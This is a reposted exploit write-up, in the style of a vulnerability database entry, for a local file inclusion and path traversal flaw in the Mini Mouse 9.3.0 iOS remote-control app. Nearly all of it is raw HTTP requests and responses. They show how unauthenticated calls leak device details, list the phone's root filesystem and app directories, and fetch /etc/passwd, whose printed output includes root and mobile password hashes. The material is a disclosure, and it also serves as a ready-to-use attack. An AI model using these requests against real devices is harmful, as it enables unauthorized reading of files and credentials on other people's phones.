Thursday, April 29, 2021

Mini Mouse 9.3.0 - Local File inclusion / Path Traversal

# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal
# Author: gosh
# Date: 05-04-2021
# Vendor Homepage: http://yodinfo.com 
# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948
# Version: 9.3.0
# Tested on: iPhone; iOS 14.4.2

GET /op=get_device_info HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
	"ret_code":	1,
	"ret_msg":	"success",
	"data":	{
		"uuid":	"7E07125B-61BE-4F12-820C-FA706C445219",
		"model":	"iPhone",
		"sys_name":	"iOS",
		"sys_version":	"14.4.2",
		"battery_state":	0,
		"battery_level":	-1,
		"memery_total_size":	2983772160,
		"device_name":	"mobile",
		"user_name":	"iPhone",
		"pwd":	"",
		"dir_user":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download",
		"dir_doc":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents",
		"dir_desktop":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop",
		"sys_type":	3
	}
}



-------------------------------------------------------------------------------------


POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
	"ret_code":	1,
	"ret_msg":	"success",
	"data":	{
		"list":	[{
				"path":	"//usr",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"usr",
				"name_display":	"usr",
				"file_size":	288,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//bin",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"bin",
				"name_display":	"bin",
				"file_size":	128,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//sbin",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"sbin",
				"name_display":	"sbin",
				"file_size":	544,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//.file",
				"is_local":	true,
				"is_hide":	true,
				"is_floder":	false,
				"name":	".file",
				"name_display":	".file",
				"file_size":	0,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//etc",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"etc",
				"name_display":	"etc",
				"file_size":	11,
				"create_time":	1577865.600000,
				"update_time":	1577865.600000,
				"sys_type":	3
			}, {
				"path":	"//System",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"System",
				"name_display":	"System",
				"file_size":	128,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//var",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"var",
				"name_display":	"var",
				"file_size":	11,
				"create_time":	1577865.600000,
				"update_time":	1577865.600000,
				"sys_type":	3
			}, {
				"path":	"//Library",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"Library",
				"name_display":	"Library",
				"file_size":	672,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//private",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"private",
				"name_display":	"private",
				"file_size":	224,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//dev",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"dev",
				"name_display":	"dev",
				"file_size":	1395,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//.ba",
				"is_local":	true,
				"is_hide":	true,
				"is_floder":	true,
				"name":	".ba",
				"name_display":	".ba",
				"file_size":	64,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//.mb",
				"is_local":	true,
				"is_hide":	true,
				"is_floder":	true,
				"name":	".mb",
				"name_display":	".mb",
				"file_size":	64,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//tmp",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"tmp",
				"name_display":	"tmp",
				"file_size":	15,
				"create_time":	1577865.600000,
				"update_time":	1577865.600000,
				"sys_type":	3
			}, {
				"path":	"//Applications",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"Applications",
				"name_display":	"Applications",
				"file_size":	3296,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//Developer",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"Developer",
				"name_display":	"Developer",
				"file_size":	64,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//cores",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"cores",
				"name_display":	"cores",
				"file_size":	64,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}]
	}
}

-------------------------
using the data found: 
/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download

POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 101

{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"}


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
	"ret_code":	1,
	"ret_msg":	"success",
	"data":	{
		"list":	[{
				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"GDT",
				"name_display":	"GDT",
				"file_size":	96,
				"create_time":	1617228.400302,
				"update_time":	1617228.400302,
				"sys_type":	3
			}, {
				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	false,
				"name":	"input_photo.jpg",
				"name_display":	"input_photo.jpg",
				"file_size":	6141491,
				"create_time":	1617583.738397,
				"update_time":	1617583.738402,
				"sys_type":	3
			}, {
				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"Ico",
				"name_display":	"Ico",
				"file_size":	64,
				"create_time":	1617583.334913,
				"update_time":	1617583.334913,
				"sys_type":	3
			}, {
				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"Download",
				"name_display":	"Download",
				"file_size":	64,
				"create_time":	1617228.371587,
				"update_time":	1617228.371587,
				"sys_type":	3
			}]
	}
}

----------------------------------------------------------------------

GET /file=/etc/passwd HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 4

{}


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/octet-stream
Content-Range: bytes 0-0/2018
Content-Length : 2018

##
# User Database
# 
# This file is the authoritative user database.
##

nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false
_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false
_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false
_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false
_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false
_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false
_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false
_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false
_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false
_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false
_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false
            
 

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated